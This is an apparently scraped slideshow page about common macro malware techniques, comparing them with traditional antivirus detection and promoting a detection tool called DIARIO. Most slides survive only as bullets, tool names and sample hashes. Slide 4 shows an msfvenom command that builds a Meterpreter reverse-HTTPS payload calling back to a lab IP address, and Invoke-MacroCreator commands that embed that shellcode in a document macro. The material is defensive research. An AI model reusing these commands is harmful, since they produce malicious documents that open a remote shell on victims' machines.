Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Common macro malware techniques vs. traditional detection models

139 views

Published on

A comparison between different macro malware techniques, how they work, and why DIARIO may help detecting them.

Published in: Internet
  • Be the first to comment

  • Be the first to like this

Common macro malware techniques vs. traditional detection models

  1. 1. • • • •
  2. 2. • • • •
  3. 3. Macro Malware technique Traditional AV solutions Invoke-MacroCreator Empire Framework Lab Homemade + Metasploit Macros from another Macros Ribbons controls
  4. 4. msfvenom -p windows/meterpreter/reverse_https LHOST=217.182.67.81 LPORT=443 -f raw Invoke-MacroCreator -i .shellcode_lab_ovh.raw -t shellcode -d body Invoke-MacroCreator -i .shellcode_lab_ovh.raw -t shellcode -d body -o 2 Example: 070887239f8fa64bed91f3d32c63e3e65b0926f3465e4520639bf95204782252
  5. 5. Example: aa8d62165e89e4bcedd39f594ec931ca0fdcbc0a90fa36502a63d41691350ab4
  6. 6. • • • • Examples: 6157980bb2a8e3928bf73afe52c48654b52e5912ac5f91dccad2591416c261e4
  7. 7. Example: 6d5eb6c7c492c5ef66b8b5484527a3639836c5cfe5f17d29cb62ff7671cafdcb
  8. 8. Examples: 0a6dfdd9814e42e001ad382c0fa3e0370dbbc07fd6cfc8c2785230bd82ecef82
  9. 9. Examples: 670b26ab5efe48be67bf93e40785c7996705ee7824bcdf06b58ab86b3d1a9384
  10. 10. Examples: 234a420991649731cabf4b35e62c56915f040457240b37d5b39c5f24b12247ae Examples: 52ffd6df85eb36adc9f3a1337be4920eb28a340987535d98216260a8dc956458 Application.Run "Book1.xls!MacroName"
  11. 11. Examples: 1c5e874e14d23b670ed824a7dc5c9119af935c4e469a11c6c27ee92817def1ee
  12. 12. Examples: e08709f5e69393fa76935fbba0d370ecfe432d359ff31f05187bd270bab589ce
  13. 13. Examples: 469ba2d436c3348a3b2e3f8ce128e6386cb2e2c63cca1fe59068388eaa20f05c

×